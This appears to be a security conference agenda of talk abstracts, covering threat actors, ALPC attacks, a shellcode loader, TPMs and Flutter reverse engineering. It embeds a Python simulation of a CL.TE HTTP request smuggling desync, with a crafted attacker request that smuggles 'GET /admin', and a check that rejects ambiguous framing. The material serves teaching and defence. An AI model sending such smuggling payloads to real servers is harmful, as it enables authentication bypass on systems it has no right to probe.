COMMSEC: CoralRaider Targets Victims' Data and Social Media Accounts
In recent findings, Cisco Talos has uncovered a new threat actor, dubbed "CoralRaider," believed to originate from Vietnam and to be financially motivated. Operating since at least 2023, CoralRaider has targeted victims primarily across Asian and Southeast Asian countries, focusing on the theft of credentials, financial data, and social media accounts, including business […]
TESTING PAGE: ALPChecker – Detecting Spoofing and Blinding Attacks
In recent years, there has been a significant increase in the number of attacks on the Windows operating system carried out using kernel drivers. A current trend is attacks that target AV/EDR systems. One vector for such attacks targets the Asynchronous Local Procedure Call (ALPC) mechanism, the Windows client-server interaction mechanism. ALPC […]
Leveraging Request Smuggling For Authentication Bypass and Remote Code Execution
Offensive cybersecurity practitioners are familiar with the abbreviations XSS, CSRF, and SQLi, but how many really recognize HRS (HTTP Request Smuggling)? Even though the original HRS paper came out nearly 20 years ago, we think request smuggling remains underappreciated in today's security world. In this presentation, we discuss three HTTP request smuggling […]
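The teaser above assumes the reader knows what request smuggling is, so here is a small, self-contained illustration of the underlying desync. It is an added example written for this listing, not code from the talk or its authors: the front end honours Content-Length, the back end honours Transfer-Encoding: chunked, and the bytes left over on the back end are prepended to the next user's request. The request bytes, the host name victim.example and the function names are all constructed for the example.

```python
"""CL.TE request desync, simulated with two deliberately naive HTTP/1.1 parsers.

Added illustration for this listing; not the talk's code. The attacker and
victim requests below are constructed for the example.
"""


def _split_head(raw: bytes):
    """Split raw request bytes into (request line, lowercase header dict, body)."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.split(b"\r\n")
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(b":")
        headers[name.strip().lower()] = value.strip()
    return lines[0], headers, body


def frontend_content_length(raw: bytes) -> bytes:
    """Front end: trusts Content-Length and forwards exactly that many body bytes."""
    _, headers, body = _split_head(raw)
    n = int(headers.get(b"content-length", b"0"))
    return raw[: len(raw) - len(body) + n]


def backend_chunked(stream: bytes):
    """Back end: trusts Transfer-Encoding: chunked.

    Returns (body of the first request, leftover bytes that the back end will
    treat as the start of the *next* request on this connection).
    """
    _, headers, body = _split_head(stream)
    if headers.get(b"transfer-encoding", b"").lower() != b"chunked":
        n = int(headers.get(b"content-length", b"0"))
        return body[:n], body[n:]
    out, rest = b"", body
    while True:
        size_line, _, rest = rest.partition(b"\r\n")
        size = int(size_line.split(b";")[0], 16)  # chunk-size, ignore extensions
        if size == 0:
            _, _, rest = rest.partition(b"\r\n")  # skip the empty trailer line
            return out, rest
        out += rest[:size]
        rest = rest[size + 2:]  # skip chunk data and its trailing CRLF


def poisoned_next_request(attacker: bytes, victim: bytes) -> bytes:
    """What the back end sees as the victim's request after the attacker's desync."""
    forwarded = frontend_content_length(attacker)
    _, leftover = backend_chunked(forwarded)
    return leftover + victim


def first_request_line(raw: bytes) -> bytes:
    return raw.split(b"\r\n", 1)[0]


def has_ambiguous_framing(raw: bytes) -> bool:
    """Defensive check: a request carrying both CL and TE is ambiguous and should be rejected."""
    _, headers, _ = _split_head(raw)
    return b"content-length" in headers and b"transfer-encoding" in headers


# Constructed attacker request: Content-Length covers the whole 38-byte body,
# but the chunked body ends after "0\r\n\r\n", leaving "GET /admin ..." unread.
ATTACKER = (
    b"POST / HTTP/1.1\r\n"
    b"Host: victim.example\r\n"
    b"Content-Length: 38\r\n"
    b"Transfer-Encoding: chunked\r\n"
    b"\r\n"
    b"0\r\n"
    b"\r\n"
    b"GET /admin HTTP/1.1\r\n"
    b"X-Smuggled: "
)

# Constructed victim request that arrives next on the same back-end connection.
VICTIM = b"GET /home HTTP/1.1\r\nHost: victim.example\r\n\r\n"

if __name__ == "__main__":
    seen = poisoned_next_request(ATTACKER, VICTIM)
    print(first_request_line(seen))  # b'GET /admin HTTP/1.1'
    print(has_ambiguous_framing(ATTACKER))  # True
```

The victim's own request line is swallowed into the X-Smuggled header of the smuggled GET /admin, so the back end serves /admin on the victim's connection. The last function is the check a practitioner wants at the edge: refuse any request that carries both framing headers rather than guessing which one the next hop will pick.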
WELCOME NOTE
COMMSEC 016
TBA
COMMSEC: My First and Last Shellcode Loader
Red teamers often leverage shellcode loaders for initial access to deploy their C2 beacons. In this presentation, I will introduce my SuperMega shellcode loader laboratory, featuring a novel file injection technique called Cordyceps. Cordyceps reuses the Import Address Table (IAT) and data sections to integrate deeply into target executables, enabling it to operate under […]
COMMSEC: TPMs and the Linux Kernel: A Better Path to Hardware Security
TPMs have been present in modern laptops and servers for some time now, but their adoption is quite low. While operating systems do provide some security features based on TPMs (think of BitLocker on Windows or dm-verity on Linux), third-party applications and libraries usually have no TPM integration. One of the […]
COMMSEC: Words Have Meaning! Leveraging LLMs to Enhance Insider Threat Investigation Capabilities
In this talk we present novel methods for using Generative AI, specifically Large Language Models (LLMs), to enhance the ability of cybersecurity investigators to trace and deter unauthorized exfiltration of text data that involves an air gap (a shift in transmission medium that resists digital forensic analysis). We review the definition […]
COMMSEC: Design and Development of a Multi-Tenant SIEM Using Security Onion
This design and development work proposes a management structure to support multi-tenant operations for MSSP (Managed Security Service Provider) software, specifically for open-source SIEM (Security Information and Event Management) software that lacks built-in multi-tenant features. The primary challenges are the separation of user authorization and management for each tenant, especially in environments with […]
COMMSEC: Exploring Vulnerabilities in Flutter Mobile Apps Through Reverse Engineering
The popularity of the Flutter mobile application framework has surged in recent years, thanks to its versatility and ease of use. However, because Flutter is still relatively new, accessibility issues frequently arise in applications created with it. Consequently, developers have resorted to hardcoding sensitive information, such as keys and secret credentials, directly into […]